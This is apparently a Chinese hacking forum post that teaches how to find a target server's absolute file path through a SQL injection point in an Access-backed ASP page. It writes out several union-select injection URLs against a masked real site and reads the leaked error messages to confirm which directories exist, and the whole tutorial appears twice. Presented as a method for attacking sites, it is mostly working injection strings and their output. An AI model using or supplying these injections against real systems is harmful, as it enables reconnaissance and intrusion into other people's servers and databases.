元旦期間在家無聊,看了一下某人關於猜絕對路徑的文章,覺得不怎麼好,他的太麻煩了。現在我來弄一個簡單點的,哈哈,希望大家喜歡!
這裏我分享的辦法有點類似access跨庫查詢 我們只要在旁站中、找到一個 顯錯模式的 access的注入點就OK了。
![]()
如上圖就是暴錯模式的 access的注入點。 現在我們隨便找了個 access的注如點:http://****.net/en/ShowNews.asp?id=12
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+admin
![]()
當我們在後面加個 .c 看看
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+admin.c
![]()
關鍵就是這裏的錯誤提示。
找不到文件 'c:\windows\system32\inetsrv\admin.mdb'。
提示找不到文件。 那麼也就是說。這個目錄 c:\windows\system32\inetsrv\ 是存在的。
那麼我們繼續。
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+c:\admin.c
![]()
注意下。 找不到文件 'c:\admin.mdb'。 也就是說 。 c:\盤是存在的。
好了。現在我們繼續。
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+c:\ajsdhakjhwkjdh\admin.c
![]()
注意現在的錯誤。
'c:\ajsdhakjhwkjdh\admin.mdb'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。
那麼。 我們可以通過這個來猜 。 目標站的路徑
這裏我分享的辦法有點類似access跨庫查詢 我們只要在旁站中、找到一個 顯錯模式的 access的注入點就OK了。
如上圖就是暴錯模式的 access的注入點。 現在我們隨便找了個 access的注如點:http://****.net/en/ShowNews.asp?id=12
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+admin
當我們在後面加個 .c 看看
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+admin.c
關鍵就是這裏的錯誤提示。
找不到文件 'c:\windows\system32\inetsrv\admin.mdb'。
提示找不到文件。 那麼也就是說。這個目錄 c:\windows\system32\inetsrv\ 是存在的。
那麼我們繼續。
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+c:\admin.c
注意下。 找不到文件 'c:\admin.mdb'。 也就是說 。 c:\盤是存在的。
好了。現在我們繼續。
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+c:\ajsdhakjhwkjdh\admin.c
注意現在的錯誤。
'c:\ajsdhakjhwkjdh\admin.mdb'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。
那麼。 我們可以通過這個來猜 。 目標站的路徑